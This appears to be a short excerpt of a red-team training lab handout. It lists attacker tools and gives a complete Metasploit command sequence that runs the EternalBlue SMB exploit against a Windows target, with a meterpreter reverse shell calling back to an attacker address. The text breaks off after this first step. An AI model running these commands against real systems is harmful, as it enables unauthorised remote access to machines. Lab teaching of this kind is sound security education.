Red Team Simulation & Adversarial Tactics Lab
Red Team Simulation & Adversarial Tactics Lab Overview This lab focuses on offensive security techniques used by adversaries to compromise systems, escalate privileges, and move laterally in a network. Students will use real-world tools to simulate cyberattacks in a controlled environment. Lab Instructions 1. Setting Up Your Red Team Environment You will need: A Kali Linux VM (or Parrot Security OS) A Windows Attack Target (Windows 10/11 VM or Active Directory lab) Preinstalled tools: Metasploit, BloodHound, Sliver, CrackMapExec 2. Gaining Initial Access Step 1: Exploit a Remote Service (Metasploit) msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS [target_ip] set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [attacker_ip] exploit ๐ Proof of Completion: Take a screenshot of a successful session. ...